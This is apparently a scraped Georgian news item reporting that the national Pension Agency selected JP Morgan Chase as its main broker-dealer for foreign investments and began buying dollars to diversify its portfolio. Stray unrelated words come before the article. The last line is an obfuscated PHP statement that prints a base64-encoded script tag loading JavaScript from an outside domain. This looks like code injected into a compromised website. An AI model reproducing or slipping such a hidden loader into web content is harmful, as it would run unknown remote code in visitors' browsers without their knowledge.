celsiusi
ავერსი შნაიდერი
საპენსიო სააგენტომ საერთაშორისო ფინანსურ ბაზრებზე ინვესტიციების განსახორციელებლად მსოფლიოში ერთ-ერთი უმსხვილესი საინვესტიციო ბანკი JP Morgan Chase-ი შეარჩია. შედეგად, JP Morgan Chase-ს იქნება საპენსიო სააგენტოს მთავარი ბროკერი-დილერი უცხოური ინვესტიციების მიმართულებით და საპენსიო სააგენტოს დავალებით და კანონის მოთხოვნების შესაბამისად სავაჭრო ტრანზაქციებს უცხოურ ფინანსურ ბაზრებზე განახორციელებს.
 
2022 წლის მარტიდან, საპენსიო სააგენტოს საინვესტიციო საბჭოს გადაწყვეტილებით, საინვესტიციო პორტფელის დივერსიფიკაცია აქტიურ ფაზაში შევიდა. შედეგად, საპენსიო სააგენტომ დოლარის შესყიდვის პროცესი ეტაპობრივად დაიწყო, ხოლო შემდეგი ნაბიჯი თანხების გლობალურ ფინანსურ ინსტრუმენტებში დაბანდება იქნება.
 
ინფორმაციისთვის, JP Morgan Chase-ი დღეისათვის მსოფლიოს უმსხვილესი საინვესტიციო ბანკია, რომლის კაპიტალიზაცია 400 მილიარდ აშშ დოლარს აჭარბებს.
762
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");